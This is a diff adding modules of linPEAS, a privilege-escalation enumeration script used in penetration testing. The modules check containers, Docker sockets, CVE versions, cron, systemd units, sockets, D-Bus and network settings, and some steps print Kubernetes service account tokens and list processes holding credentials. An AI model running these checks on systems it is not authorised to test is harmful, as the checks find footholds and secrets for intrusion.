+    for dock_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null); do
+      if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then
+        echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g"
+        echo "Docker enummeration:"
+        docker_enumerated=""
+
+        if [ "$(command -v curl)" ]; then
+          sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)"
+          dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
+          echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
+          if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi
+        fi
+
+        if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then
+          sockInfoResponse="$(docker info)"
+          dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4)
+          printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
+        fi
+
+      else
+        echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g"
+      fi
+    done
+  fi
+}
+
+checkDockerVersionExploits() {
+  if echo "$dockerVersion" | grep -iq "not found"; then
+    VULN_CVE_2019_13139="$(echo_not_found)"
+    VULN_CVE_2019_5736="$(echo_not_found)"
+    return
+  fi
+
+  VULN_CVE_2019_13139="$(echo_no)"
+  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then
+    VULN_CVE_2019_13139="Yes"
+  fi
+
+  VULN_CVE_2019_5736="$(echo_no)"
+  if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then
+    VULN_CVE_2019_5736="Yes"
+  fi
+}
+
+checkContainerExploits() {
+  VULN_CVE_2019_5021="$(echo_no)"
+  if [ -f "/etc/alpine-release" ]; then
+    alpineVersion=$(cat /etc/alpine-release)
+    if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then
+      VULN_CVE_2019_5021="Yes"
+    fi
+  fi
+}
+
+
+##############################################
+#---------------) Containers (---------------#
+##############################################
+containerCheck
+
+print_2title "Container related tools present"
+command -v docker 
+command -v lxc 
+command -v rkt 
+command -v kubectl
+command -v podman
+command -v runc
+
+print_2title "Container details"
+print_list "Is this a container? ...........$NC $containerType"
+
+print_list "Any running containers? ........ "$NC
+# Get counts of running containers for each platform
+dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
+podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
+lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
+rktcontainers=$(rkt list 2>/dev/null | tail -n +2  | wc -l)
+if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
+    echo_no
+else
+    containerCounts=""
+    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
+    if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
+    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
+    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
+    echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
+    
+    # List any running containers
+    if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
+    if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
+    if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
+    if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
+fi
+
+#If docker
+if echo "$containerType" | grep -qi "docker"; then
+    print_2title "Docker Container details"
+    inDockerGroup
+    print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Looking and enumerating Docker Sockets\n"$NC
+    enumerateDockerSockets
+    print_list "Docker version .................$NC$dockerVersion"
+    checkDockerVersionExploits
+    print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+    if [ "$inContainer" ]; then
+        checkDockerRootless
+        print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
+    fi
+    if df -h | grep docker; then
+        print_2title "Docker Overlays"
+        df -h | grep docker
+    fi
+fi
+
+if [ "$inContainer" ]; then
+    echo ""
+    print_2title "Container & breakout enumeration"
+    print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout"
+    print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')"
+    if echo "$containerType" | grep -qi "docker"; then
+        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
+    fi
+
+    checkContainerExploits
+    print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+
+    if echo "$containerType" | grep -qi "kubernetes"; then
+        print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
+        print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
+        print_2title "Kubernetes Information"
+        echo ""
+        
+        print_3title "Kubernetes service account folder"
+        ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
+        echo ""
+        
+        print_3title "Kubernetes env vars"
+        (env | set) | grep -Ei "kubernetes|kube"
+    fi
+    echo ""
+
+    print_2title "Container Capabilities"
+    capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
+    echo ""
+
+    print_2title "Privilege Mode"
+    if [ -x "$(command -v fdisk)" ]; then
+        if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
+            echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
+        else
+            echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
+        fi
+    else
+        echo_not_found
+    fi
+    echo ""
+
+    print_2title "Interesting Files Mounted"
+    (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,docker.sock,${SED_RED_YELLOW},"
+    echo ""
+
+    print_2title "Possible Entrypoints"
+    ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
+    echo ""
+fi

linPEAS/builder/linpeas_parts/3_procs_crons_timers_srvcs_sockets.sh

@@ -0,0 +1,306 @@
+
+####################################################
+#-----) Processes & Cron & Services & Timers (-----#
+####################################################
+
+#-- PCS) Cleaned proccesses
+print_2title "Cleaned processes"
+if [ "$NOUSEPS" ]; then
+  printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
+fi
+print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes"
+
+if [ "$NOUSEPS" ]; then
+  print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+  pslist=$(print_ps)
+else
+  (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
+    echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+    if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then
+      cpid=$(echo "$psline" | awk '{print $2}')
+      caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
+      if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
+        printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
+      fi
+    fi
+  done
+  pslist=$(ps auxwww)
+  echo ""
+
+  #-- PCS) Binary processes permissions
+  print_2title "Binary processes permissions (non 'root root' and not beloging to current user)"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes"
+  binW="IniTialiZZinnggg"
+  ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
+    if [ -w "$bpath" ]; then
+      binW="$binW|$bpath"
+    fi
+  done
+  ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
+fi
+echo ""
+
+#-- PCS) Files opened by processes belonging to other users
+if ! [ "$IAMROOT" ]; then
+  print_2title "Files opened by processes belonging to other users"
+  print_info "This is usually empty because of the lack of privileges to read other user processes information"
+  lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+  echo ""
+fi
+
+#-- PCS) Processes with credentials inside memory
+print_2title "Processes with credentials in memory (root req)"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory"
+if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
+if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
+if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
+if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
+if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
+if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
+echo ""
+
+#-- PCS) Different processes 1 min
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
+  print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs"
+  temp_file=$(mktemp)
+  if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi
+  echo ""
+fi
+
+#-- PCS) Cron
+print_2title "Cron jobs"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs"
+command -v crontab 2>/dev/null || echo_not_found "crontab"
+crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+command -v incrontab 2>/dev/null || echo_not_found "incrontab"
+incrontab -l 2>/dev/null
+ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
+cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
+crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
+ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
+atq 2>/dev/null
+echo ""
+
+if [ "$MACPEAS" ]; then
+  print_2title "Third party LaunchAgents & LaunchDemons"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
+  ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
+  echo ""
+
+  print_2title "Writable System LaunchAgents & LaunchDemons"
+  find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
+    program=""
+    program=$(defaults read "$f" Program 2>/dev/null)
+    if ! [ "$program" ]; then
+      program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
+    fi
+    if [ -w "$program" ]; then
+      echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
+    fi
+  done
+  echo ""
+
+  print_2title "StartupItems"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
+  ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
+  echo ""
+
+  print_2title "Login Items"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
+  osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
+  echo ""
+
+  print_2title "SPStartupItemDataType"
+  system_profiler SPStartupItemDataType
+  echo ""
+
+  print_2title "Emond scripts"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
+  ls -l /private/var/db/emondClients
+  echo ""
+fi
+
+#-- PCS) Services
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Services"
+  print_info "Search for outdated versions"
+  (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
+  echo ""
+fi
+
+#-- PSC) systemd PATH
+print_2title "Systemd PATH"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths"
+systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
+WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
+echo ""
+
+#-- PSC) .service files
+#TODO: .service files in MACOS are folders
+print_2title "Analyzing .service files"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services"
+printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
+  if [ ! -O "$s" ]; then #Remove services that belongs to the current user
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
+      echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
+    fi
+    servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
+    printf "%s\n" "$servicebinpaths" | while read sp; do
+      if [ -w "$sp" ]; then
+        echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
+      fi
+    done
+    relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
+    relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/")
+    if [ "$relpath1" ] || [ "$relpath2" ]; then
+      if [ "$WRITABLESYSTEMDPATH" ]; then
+        echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},";
+      else
+        echo "$s is executing some relative path"
+      fi
+    fi
+  fi
+done
+if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
+echo ""
+
+#-- PSC) Timers
+print_2title "System timers"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers"
+(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
+echo ""
+
+#-- PSC) .timer files
+print_2title "Analyzing .timer files"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers"
+printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
+  if ! [ "$IAMROOT" ] && [ -w "$t" ]; then
+    echo "$t" | sed -${E} "s,.*,${SED_RED},g"
+  fi
+  timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
+  printf "%s\n" "$timerbinpaths" | while read tb; do
+    if [ -w "$tb" ]; then
+      echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
+    fi
+  done
+  #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
+  #for rp in "$relpath"; do
+  #  echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
+  #done
+done
+echo ""
+
+#-- PSC) .socket files
+#TODO: .socket files in MACOS are folders
+if ! [ "$IAMROOT" ]; then
+  print_2title "Analyzing .socket files"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets"
+  printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
+      echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
+    fi
+    socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+    printf "%s\n" "$socketsbinpaths" | while read sb; do
+      if [ -w "$sb" ]; then
+        echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
+      fi
+    done
+    socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+    printf "%s\n" "$socketslistpaths" | while read sl; do
+      if [ -w "$sl" ]; then
+        echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
+      fi
+    done
+  done
+  if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then
+    echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g"
+  fi
+  if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then
+    echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g"
+  fi
+  echo ""
+
+  print_2title "Unix Sockets Listening"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets"
+  # Search sockets using netstat and ss
+  unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
+  if ! [ "$unix_scks_list" ];then
+    unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
+  fi
+  if ! [ "$unix_scks_list" ];then
+    unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
+  fi
+  
+  # But also search socket files
+  unix_scks_list2=$(find / -type s 2>/dev/null)
+
+  # Detele repeated dockets and check permissions
+  (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do
+    perms=""
+    if [ -r "$l" ]; then
+      perms="Read "
+    fi
+    if [ -w "$l" ];then
+      perms="${perms}Write"
+    fi
+    if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
+    else 
+      echo "$l" | sed -${E} "s,$l,${SED_RED},g"
+      echo "  └─(${RED}${perms}${NC})"
+      # Try to contact the socket
+      socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
+      if [ $? -eq 0 ]; then
+        owner=$(ls -l "$s" | cut -d ' ' -f 3)
+        echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+        echo "$socketcurl" | head -n 30
+      fi
+    fi
+  done
+  echo ""
+fi
+
+#-- PSC) Writable and weak policies in D-Bus config files
+print_2title "D-Bus config files"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus"
+if [ "$PSTORAGE_DBUS" ]; then
+  printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
+    for f in $d/*; do
+      if ! [ "$IAMROOT" ] && [ -w "$f" ]; then
+        echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
+      fi
+
+      genpol=$(grep "<policy>" "$f" 2>/dev/null)
+      if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+      #if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
+
+      userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
+      if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+      #for g in `groups`; do
+      #  if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
+      #done
+      grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
+      if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+
+      #TODO: identify allows in context="default"
+    done
+  done
+fi
+echo ""
+
+print_2title "D-Bus Service Objects list"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus"
+dbuslist=$(busctl list 2>/dev/null)
+if [ "$dbuslist" ]; then
+  busctl list | while read line; do
+    echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
+    if ! echo "$line" | grep -qE "$dbuslistG"; then
+      srvc_object=$(echo $line | cut -d " " -f1)
+      srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
+      if [ "$srvc_object_info" ]; then
+        echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
+      fi
+    fi
+  done
+else echo_not_found "busctl"
+fi

linPEAS/builder/linpeas_parts/4_network_information.sh

@@ -0,0 +1,184 @@
+###########################################
+#---------) Network Information (---------#
+###########################################
+
+if [ "$MACOS" ]; then
+  print_2title "Network Capabilities"
+  warn_exec system_profiler SPNetworkDataType
+  echo ""
+fi
+
+#-- NI) Hostname, hosts and DNS
+print_2title "Hostname, hosts and DNS"
+cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
+warn_exec dnsdomainname 2>/dev/null
+echo ""
+
+#-- NI) /etc/inetd.conf
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
+  (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
+  echo ""
+fi
+
+#-- NI) Interfaces
+print_2title "Interfaces"
+cat /etc/networks 2>/dev/null
+(ifconfig || ip a) 2>/dev/null
+echo ""
+
+#-- NI) Neighbours
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Networks and neighbours"
+  if [ "$MACOS" ]; then
+    netstat -rn 2>/dev/null
+  else
+    (route || ip n || cat /proc/net/route) 2>/dev/null
+  fi
+  (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
+  echo ""
+fi
+
+if [ "$MACPEAS" ]; then
+  print_2title "Firewall status"
+  warn_exec system_profiler SPFirewallDataType
+fi
+
+#-- NI) Iptables
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Iptables rules"
+  (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
+  echo ""
+fi
+
+#-- NI) Ports
+print_2title "Active Ports"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports"
+( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},"
+echo ""
+
+#-- NI) MacOS hardware ports
+if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
+  print_2title "Hardware Ports"
+  networksetup -listallhardwareports
+  echo ""
+
+  print_2title "VLANs"
+  networksetup -listVLANs
+  echo ""
+
+  print_2title "Wifi Info"
+  networksetup -getinfo Wi-Fi
+  echo ""
+
+  print_2title "Check Enabled Proxies"
+  scutil --proxy
+  echo ""
+
